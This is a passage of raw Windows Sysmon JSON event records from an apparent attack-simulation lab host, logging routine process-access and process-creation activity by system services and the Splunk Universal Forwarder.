07:53:28.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.095\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-00102FF30300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.095","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-00102FF30300}","TargetProcessId":"4004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.327\r\nProcessGuid: {41C8662E-1F78-5F25-0000-0010C0F50300}\r\nProcessId: 4028\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.327","ProcessGuid":"{41C8662E-1F78-5F25-0000-0010C0F50300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 